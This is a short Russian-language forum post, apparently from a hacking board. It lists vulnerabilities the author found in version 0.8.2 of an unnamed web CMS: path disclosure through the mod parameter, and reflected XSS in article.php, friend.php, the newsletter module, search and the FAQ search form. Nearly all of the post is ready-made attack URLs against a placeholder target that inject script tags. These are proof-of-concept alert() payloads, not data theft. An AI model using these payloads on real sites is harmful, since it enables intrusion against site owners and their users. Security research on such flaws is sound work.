В дополнение найденое мной в версии 0.8.2(думаю будет работать и на других аналогичных)
раскрытие пути
Сценарий mod параметр mod(неверный параметр, или в массив)
Код:
http://[target]/mod.php?mod=
Код:
http://[target]/mod.php?mod[]=
пассивные XSS
сценарии article.php friend.php параметр sid
Код:
http://[target]/article.php?op=Print&sid=17<script>alert(11111)</script>
Код:
http://[target]/friend.php?op=FriendSend&sid=17"/><script>alert(/1/)</script>
модуль newsletter
Код:
http://[target]/mod.php?mod=newsletter&op=archive&id=44"/><script>alert(/1/)</script>
Код:
http://[target]/mod.php?mod=newsletter&op=read&id=706&listid=44"/><script>alert(/1/)</script>
в поиске
"/><script>alert(/1/)</script>
Код:
http://[target]/search.php
в форму пойска модуля faq >><script>alert(11111)</script>
Код:
http://[target]/mod.php?mod=faq&op=search_form
И последняя работает не везде, почему не разобрался
Код:
http://[target]/mod.php?mod=faq>><script>alert(11111)</script>
Всё найденное точно работает в версии 0.8.2, также проверялось на нескольких неопознанных версиях